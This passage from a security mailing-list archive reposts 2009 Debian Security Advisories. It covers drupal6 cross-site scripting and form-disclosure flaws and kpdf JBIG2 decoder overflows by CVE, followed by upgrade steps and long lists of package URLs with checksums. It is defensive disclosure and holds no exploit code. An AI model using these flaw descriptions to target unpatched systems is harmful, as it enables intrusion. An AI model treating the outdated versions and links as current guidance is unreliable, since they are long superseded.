proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/moin/moin_1.7.1-3+lenny2.diff.gz Size/MD5 checksum: 78829 46802a81d20427b26a8aa60af1f576c9 http://security.debian.org/pool/updates/main/m/moin/moin_1.7.1.orig.tar.gz Size/MD5 checksum: 5468224 871337b8171c91f9a6803e5376857e8d http://security.debian.org/pool/updates/main/m/moin/moin_1.7.1-3+lenny2.dsc Size/MD5 checksum: 1258 13d23d74a20087879c69545351a59dad Architecture independent packages: http://security.debian.org/pool/updates/main/m/moin/python-moinmoin_1.7.1-3+lenny2_all.deb Size/MD5 checksum: 4506106 9fb6772b6c4f6eb816a488593257f026 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkoBduUACgkQ62zWxYk/rQeaLQCcCIjUe5bXFabGIkRa+qYFEn6E JzYAnRahgUz15biKGLL2Ys99GLGYQ7+y =KC1a -----END PGP SIGNATURE----- From noahm at debian.org Wed May 6 16:54:22 2009 From: noahm at debian.org (Noah Meyerhans) Date: Wed, 06 May 2009 15:54:22 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1792-1] New drupal6 packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1792-1 security at debian.org http://www.debian.org/security/ Noah Meyerhans May 06, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : drupal6 Vulnerability : multiple Problem type : remote Debian-specific: no Debian Bug : 526378 Multiple vulnerabilities have been discovered in drupal, a web content management system. pod.Edge discovered a cross-site scripting vulnerability due that can be triggered when some browsers interpret UTF-8 strings as UTF-7 if they appear before the generated HTML document defines its Content-Type. This allows a malicious user to execute arbitrary javascript in the context of the web site if they're allowed to post content. Moritz Naumann discovered an information disclosure vulnerability. If a user is tricked into visiting the site via a specially crafted URL and then submits a form (such as the search box) from that page, the information in their form submission may be directed to a third-party site determined by the URL and thus disclosed to the third party. The third party site may then execute a cross-site request forgery attack against the submitted form. For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny1. The old stable distribution (etch) does not contain drupal and is not affected. For the unstable distribution (sid), these problems have been fixed in version 6.11-1 We recommend that you upgrade your drupal6 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny1.dsc Size/MD5 checksum: 1124 bedc53674c2746aa0172ba085ee49cf7 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny1.diff.gz Size/MD5 checksum: 19809 907241818d13cff27fd8eb8487002ad6 Architecture independent packages: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny1_all.deb Size/MD5 checksum: 1083398 0f30de9089c576ecdb85acf8e71e87a3 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAbI8YrVLjBFATsMRAqhzAJoCMY3Y8IiuvCrIjqZIwY8n/x9NewCgisaL ji5qVBsBZ6frrXsksydMf2o= =yG9u -----END PGP SIGNATURE----- From noahm at debian.org Wed May 6 17:47:53 2009 From: noahm at debian.org (Noah Meyerhans) Date: Wed, 06 May 2009 16:47:53 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1793-1] New kdegraphics packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1793-1 security at debian.org http://www.debian.org/security/ Noah Meyerhans May 06, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : kdegraphics Vulnerability : multiple Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-0146 CVE-2009-0147 CVE-2009-0165 CVE-2009-0166 CVE-2009-0799 CVE-2009-0800 CVE-2009-1179 CVE-2009-1180 CVE-2009-1181 CVE-2009-1182 CVE-2009-1183 Debian Bug : 524810 kpdf, a Portable Document Format (PDF) viewer for KDE, is based on the xpdf program and thus suffers from similar flaws to those described in DSA-1790. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0146 Multiple buffer overflows in the JBIG2 decoder in kpdf allow remote attackers to cause a denial of service (crash) via a crafted PDF file, related to (1) JBIG2SymbolDict::setBitmap and (2) JBIG2Stream::readSymbolDictSeg. CVE-2009-0147 Multiple integer overflows in the JBIG2 decoder in kpdf allow remote attackers to cause a denial of service (crash) via a crafted PDF file, related to (1) JBIG2Stream::readSymbolDictSeg, (2) JBIG2Stream::readSymbolDictSeg, and (3) JBIG2Stream::readGenericBitmap. CVE-2009-0165 Integer overflow in the JBIG2 decoder in kpdf has unspecified impact related to "g*allocn." CVE-2009-0166 The JBIG2 decoder in kpdf allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers a free of uninitialized memory. CVE-2009-0799 The JBIG2 decoder in kpdf allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers an out-of-bounds read. CVE-2009-0800 Multiple "input validation flaws" in the JBIG2 decoder in kpdf allow remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1179 Integer overflow in the JBIG2 decoder in kpdf allows remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1180 The JBIG2 decoder in kpdf allows remote attackers to execute arbitrary code via a crafted PDF file that triggers a free of invalid data. CVE-2009-1181 The JBIG2 decoder in kpdf allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers a NULL pointer dereference. CVE-2009-1182 Multiple buffer overflows in the JBIG2 MMR decoder in kpdf allow remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1183 The JBIG2 MMR decoder in kpdf allows remote attackers to cause a denial of service (infinite loop and hang) via a crafted PDF file. We recommend that you upgrade your kdegraphics packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.5-3etch3.diff.gz Size/MD5 checksum: 432182 2053275597413021f87e328af7f43d0f http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.5-3etch3.dsc Size/MD5 checksum: 1536 57806c433333025933014631c41e518a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.5.orig.tar.gz Size/MD5 checksum: 9012930 944e16dde53ffdb8c25a90d951a9d223 Architecture independent packages: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-doc-html_3.5.5-3etch3_all.deb Size/MD5 checksum: 156348 10d47436c7ad315663e54f5bef6956fe http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.5-3etch3_all.deb Size/MD5 checksum: 19940 c4a51eb3d3eaf0de3e401e66d77093dd alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 82940 279fe5e4b03666f881f1a9d53fc49be9 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 198562 ee1af15d9d521f7508eda61000500330 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 856558 319b936aa8bbf8b2e7f38b16871d504c http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 780850 34e264cffbc7acec902cd985c1580d82 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 1146416 948e35d1a8c6a39b63ad036c8ac4807b http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 114074 a9ac69d9ffbdcc89146f990b16fcdc81 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 509372 cb5a8055bc0af7cbf33566d8147330fc http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 251380 4503f766d0a0fba671df9c45b632d6e6 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 255340 9b7321ad4b356ce7024bf9044c3ac0e0 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 887210 61802ba3026c338444c39e90daa2cfc8 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 152524 fdca706a9c72c744347851b3b1dabab8 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 19778 46e1c53f720d1113d760de97d7959e14 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 119238 9502ccbf2d0c6138758223ad4be3e602 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 439306 761c97f184e4b5b5f6561217f304cab3 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 67738 3329566f1606c4a5b22876d2e0b43f64 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 97698 1d545e748c4c87f690fa5b97d15faf43 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 100252 50b05eb39a39bf9ce9088d4082b169b6 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 179954 89023dbb012658381c434e6d3b7bf701 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 329172 77265d59ebfaa8c0fba02bcbae5e5cb5 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 153144 c23d64d5d6b3003c3f981888f5e3b555 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 34302218 2ab32f3faab33ad6777055cc60809084 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 2374958 14c5f1b7af6dd98e6e8c742e544d4cbc http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 548672 f2f2cd6115df10055485a49ba026b7a7 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_alpha.deb Size/MD5 checksum: 1365378 5ea34f18f684eac4c47b7883316ec002 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 1221106 7064667752a9ba80fbb01ebc97159f59 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 1100682 51a7a1d62eaae040b089e5044e9a2171 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 499030 84d8d310e996083df53e67708abe71f1 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 149576 50488742c48273f9c487a38c1aacd018 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 243014 0b9688f7dd1d7ba64f17cbe2b750a3a4 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 292926 071bce4faeaf81992111cc71ad31b50f http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 111860 b38ef5ee22f8b4a99e3c54cebccd35f5 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 109344 eb13d634f9546fab21444ecbbc2c72a2 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 240432 14a1facecfe3fbd543733814a8dd9940 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 768332 7475be7d9f5dcb52d354f3087cae44ce http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 540444 23fc287b643cd057027ed6c3c3892c06 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 423860 b4bac054eb6c187f06658f686ffc284a http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 2290492 91008033d6ea0404baad997d070d8499 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 93608 73239125281fd9ab71e0e2c003f64c16 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 829848 cf8f0faecff0e9cb457d8e7876c5cb3c http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 144850 0523fe801015d735b533ebeb1d42af0b http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 19770 c15b3117e8f9d3ebad285f6d9fd30369 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 25829340 99731d961c5da4b33206b5d8e5ee6e65 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 176602 c4d728cff49c6378eedd7e6d51f08d89 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 792056 4bc31d4602b1f388176d679342e3b2e9 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 80366 595d9816ff2496d6107b300dad1d00a1 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 69172 a010e8f0752195840577f74225d4b8c1 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 184414 82a45153191311a867e8987b6856ac3a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_amd64.deb Size/MD5 checksum: 102092 49474d1629a1a8ae7f4440af50eeb386 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 557078 f93de4d9f6491d01219db0c8824c5995 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 1427090 89ecc1a0f7237c37e05301e357c920a7 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 178114 7b29a4e451f3baa76c3c8d31df45092e http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 101166 ab806cba6cc35d39fb99e4d9ecd5e623 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 111690 23250e8035e9a0f49d240adf4fd8bed0 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 190006 b1843a4fbe215c53099147bb4f5a499c http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 257218 140d3302cce2559f5bccca89d5d9c201 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 114510 5a914c1e0d2c44214bbfebac69e08f28 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 509576 a005951109ac32f9b3584328779f539b http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 1140932 d21a86fecc36400d19a5de668cb64113 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 67148 f837bc6a3e66a9d099a5b4665ec075de http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 19784 306bb35c95f55610ef54d4ac33b3d48a http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 150288 25372b68f1f04ebc7292399a82e6494b http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 860146 350bf86e1b9f1fe54f0d680c28dfc5d3 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 890216 45cadf66a4ba3ade00599a5424e31488 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 84352 38c1b63ec876bc1c7784fc115c42463b http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 97706 1fa7077224617b0c5316b2c650ce11f7 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 26248636 8fdef26d69949764e5622f092680e37e http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 445242 955cf320ee94cfff3d5dc57a32c3c960 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 152216 13ca704189205e2cb60d111e4570f6e6 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 316704 c474d130f7ab6238079c760b89b6fee1 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 253848 790ad439aa7bf2ff386cb95f30fd7dfe http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 769756 efb373759e1a813f330c57f570ade3ad http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_hppa.deb Size/MD5 checksum: 2454094 159ffc0522b53414294b36ea2e9c829d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_i386.deb Size/MD5 checksum: 785190 14ddfe9a0d86cc8b93506d9202ebb242 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_i386.deb Size/MD5 checksum: 103970 621234e9a9ce4a2241375c4ff8407b23 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_i386.deb Size/MD5 checksum: 146376 4c1747c88b264290e38ada6514218775 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_i386.deb Size/MD5 checksum: 108272 9394db8868121992889a43502841ad84 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_i386.deb Size/MD5 checksum: 234612 d04cd6cecb73f366e88b7aa483241e4a http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_i386.deb Size/MD5 checksum: 68122 885186d94cd806016d01d88e9fc82c0f http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_i386.deb Size/MD5 checksum: 135552 68aaf8c0424a3e25594360ab58ea60ec http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_i386.deb Size/MD5 checksum: 532588 8bc752bdbd54e298afd3f37a20f56d18 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_i386.deb Size/MD5 checksum: 262490 a07ac3d740f874006b7e7194f5719e28 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_i386.deb Size/MD5 checksum: 173904 80757bd6f6f56c4abd597accb87eaa06 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_i386.deb Size/MD5 checksum: 90496 363d4446a465d740fd23c728469bcab1 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_i386.deb Size/MD5 checksum: 177684 d508e51f067f10665f1edb78c8871c29 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_i386.deb Size/MD5 checksum: 2228302 61201ff71df3528e30ddf66af532b604 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_i386.deb Size/MD5 checksum: 401376 870948b3120613ab4b13cfc8bcfe33b7 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_i386.deb Size/MD5 checksum: 223606 4f5e08323a73c2b5f100dac01c949d47 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_i386.deb Size/MD5 checksum: 493804 569e64088add9c21e567b94b14372315 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_i386.deb Size/MD5 checksum: 78866 09ccb537e64fbdbda588562666f8c5b3 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_i386.deb Size/MD5 checksum: 19774 d1fb6a85662301ba752d8381c138270a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_i386.deb Size/MD5 checksum: 25359080 c907475dd78c8f69d8c099d140689ce7 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_i386.deb Size/MD5 checksum: 758452 1dd0cf90b6f07059456eadc0cdf75a5d http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_i386.deb Size/MD5 checksum: 745290 1cc39477c0ba3f8dd36346cdd8136033 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_i386.deb Size/MD5 checksum: 102640 084fb69239a6e3a7d226f403153052f1 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_i386.deb Size/MD5 checksum: 1074930 44e0e1869192fcb275e5e46b0aa9517b http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_i386.deb Size/MD5 checksum: 1221078 e3b837e7596791b4da1377770822e122 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 73408 f6c137631b46af9aeb03ef7dc557e4ae http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 1471968 9131e67370a77e3806bbe0b919e1c3c5 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 220710 87a5463ac72906486a2b61c63a0d53db http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 291172 9247413922248b0eb5857e2614a39770 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 179016 0a214cb3c31f671bbe9a1f2d02c4eb2a http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 126772 36898efcdac049a8b923bd96485fa2c4 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 110466 f32a799db30d10fe0d313c8262295681 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 187896 a53bd37b6cd540610fc083f1328357e5 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 93782 bfc47bf81b97d8ee8be88c67a296a6e5 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 1120834 26b9f4873159ca602d18e45fd6c1b01e http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 2666616 1649d62de1f45e635a6d761694728d35 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 811332 f79b79ad7a99264c46c2d1e139ecf6f9 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 19774 f6a8d49b4d5eb2c43265af3a6ee973ac http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 1255290 30cb556975cb30d8164ff32ccd844dee http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 290436 f6845967d61901acd012d9a12f2e4f20 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 129184 040328f294b680724ca530e6149502fd http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 533796 1b89fd4d86619aebf1609232f2f077cb http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 25336890 686b93159840f28ffdce7e5e82f08660 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 100236 3af187da099b7aca0334955984b99f2d http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 603830 7905bac6125e1fd01d1e74a18456d71d http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 166168 a4acdefd377c2a1cc6fa1938cdcfab79 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 487248 068a09550168dc89a4a0428b6c602392 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 1060540 eff88d6d0eb489a6f4a68787c2541ef6 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_ia64.deb Size/MD5 checksum: 391544 ba2c14c80e15590f2cce94e4f2cb85a2 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_mips.deb Size/MD5 checksum: 1140412 183b91083f50b9ecd20196a19b17a19e http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_mips.deb Size/MD5 checksum: 1131892 697dca14c8d94da8622322da6d3f1a5d http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_mips.deb Size/MD5 checksum: 224632 18c48a36ac6629e9f4d0000b9a4e3b21 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_mips.deb Size/MD5 checksum: 106302 ef9532eec779bb232b8deb8e03c0d660 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_mips.deb Size/MD5 checksum: 519186 